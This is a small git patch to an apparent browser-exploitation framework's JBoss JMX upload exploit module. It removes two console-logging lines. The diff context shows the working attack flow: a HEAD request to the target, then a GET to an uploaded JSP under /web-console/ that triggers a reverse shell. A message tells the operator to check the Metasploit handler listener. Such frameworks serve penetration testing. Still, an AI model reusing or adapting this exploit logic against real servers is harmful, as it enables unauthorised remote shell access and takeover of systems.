From f70bc8d8bdb2b9e3b954b740341b52a053fa2554 Mon Sep 17 00:00:00 2001 From: antisnatchor Date: Thu, 19 May 2011 09:17:04 +0000 Subject: [PATCH] removed console logging (I've forgot it) to prevent errors in the puto IE git-svn-id: https://beef.googlecode.com/svn/trunk@977 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- modules/network/jboss_jmx_upload_exploit/command.js | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/network/jboss_jmx_upload_exploit/command.js b/modules/network/jboss_jmx_upload_exploit/command.js index ba2ea7d92..c09e15b89 100644 --- a/modules/network/jboss_jmx_upload_exploit/command.js +++ b/modules/network/jboss_jmx_upload_exploit/command.js @@ -19,11 +19,9 @@ beef.execute(function() { /* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/ beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){ - console.log("jboss HEAD response code [" + response.status_code + "]"); if(response.status_code == "success"){ function triggerReverseConn(){ beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){ - console.log("jboss GET response code [" + response.status_code + "]"); if(response.status_code == "success"){ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener."); }else{